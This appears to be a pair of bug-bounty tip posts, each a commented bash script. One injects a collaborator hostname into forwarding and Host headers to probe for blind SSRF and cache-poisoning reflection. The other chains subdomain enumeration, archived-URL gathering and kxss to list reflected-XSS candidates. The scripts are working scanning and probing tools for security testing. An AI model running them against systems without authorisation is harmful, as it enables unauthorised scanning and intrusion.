Checking for blind #SSRF in Headers & #XSS via cache poisoning
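# Header-reflection / blind-SSRF probe.
# Input:  urls.txt, one root domain per line (assetfinder reads the domains
#         from stdin; httprobe turns the resulting hosts into live URLs).
# Output: per URL, the response lines that echo the injected hostname.
#
# Reading the results:
#  - A non-empty Method[1..3] line only shows that the response echoes the
#    header value. It is not proof of cache poisoning: that needs the same
#    content to be served to a later request that does not send the header.
#  - Blind SSRF never shows up here. Evidence is a DNS/HTTP interaction in
#    the collaborator log for the hostname below.

# Placeholder hostname from the original post; replace with a collaborator
# host you control. One variable keeps all four methods and the report in sync
# (the original used two different hostnames for method 4).
collab_host='xss.burpcollaboratorhost'

# probe_header URL HEADER_NAME
# Sends HEADER_NAME set to the collaborator host and prints the response lines
# that contain that exact hostname. Matching the whole injected value instead
# of the substring "xss" avoids hits on pages that merely mention XSS.
# --max-time keeps one unresponsive host from stalling the whole loop
# (10 s is a constructed default; tune as needed).
probe_header() {
  curl -s -L --max-time 10 -H "$2: ${collab_host}" "$1" \
    | grep -F -- "$collab_host"
}

assetfinder --subs-only < urls.txt | httprobe | while IFS= read -r url; do
  xss1=$(probe_header "$url" 'X-Forwarded-For')
  xss2=$(probe_header "$url" 'X-Forwarded-Host')
  xss3=$(probe_header "$url" 'Host')

  # Method 4: absolute-URI request target. The response body carries no
  # signal for a blind check, so it is discarded instead of being captured
  # in a variable that is never printed.
  curl -s -L --max-time 2 --request-target "http://${collab_host}/" "$url" \
    > /dev/null

  # printf instead of echo -e: response text is passed as data and is never
  # interpreted as escape sequences.
  printf '%s\n' \
    "$url" \
    "Method[1] X-Forwarded-For: xss+ssrf => ${xss1}" \
    "Method[2] X-Forwarded-Host: xss+ssrf ==> ${xss2}" \
    "Method[3] Host: xss+ssrf ==> ${xss3}" \
    "Method[4] GET http://${collab_host}/ HTTP/1.1" \
    ''
done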
https://github.com/tomnomnom/assetfinder
https://github.com/tomnomnom/httprobe
#bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp
#ssrf #xss #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp
Simple script for finding Cross-Site Scripting (XSS) vulnerabilities
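#!/bin/bash
# Passive subdomain enumeration for one domain, followed by a check of
# archived URLs for reflected parameters.
#
# Usage:   ./script.sh <domain>
# Outputs: domains_subfinder_<domain>   subfinder results
#          domains_<domain>             amass results merged with subfinder's
#          domains_<domain>.txt         merged names that resolve
#          xss.txt                      kxss output
#
# kxss output lists reflection candidates; each entry still has to be
# confirmed by hand before it counts as an XSS finding.
set -u

target=${1:?usage: $0 <domain>}

# The argument ends up in file names and on tool command lines, so accept
# only hostname characters. This rejects a leading '-' (would be parsed as an
# option) and '/' (would redirect the output files to another directory).
if [[ ! $target =~ ^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$ ]]; then
  printf 'invalid domain: %s\n' "$target" >&2
  exit 2
fi

subfinder -d "$target" -o "domains_subfinder_${target}"
amass enum --passive -d "$target" -o "domains_${target}"

# Merge the subfinder results into the amass list. The original appended to
# "domain_<domain>" (missing "s"), a file nothing reads, so the subfinder
# results never reached the later stages.
tee -a "domains_${target}" < "domains_subfinder_${target}"

# Both tools report many of the same names; de-duplicate so each host is
# resolved and probed once.
sort -u "domains_${target}" | filter-resolved | tee -a "domains_${target}.txt"

httprobe -p http:81 -p http:8080 -p https:8443 < "domains_${target}.txt" \
  | waybackurls \
  | kxss \
  | tee xss.txt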
https://github.com/projectdiscovery/subfinder
https://github.com/OWASP/Amass
https://github.com/tomnomnom/hacks/tree/master/filter-resolved
https://github.com/tomnomnom/httprobe
https://github.com/tomnomnom/waybackurls
https://github.com/tomnomnom/hacks/tree/master/kxss
#bugbounty #bugbountytips #xss #subfinder #httprobe #waybackurls #kxss #amass
#bugbounty #bugbountytips #xss #subfinder #httprobe #waybackurls #kxss #AMASS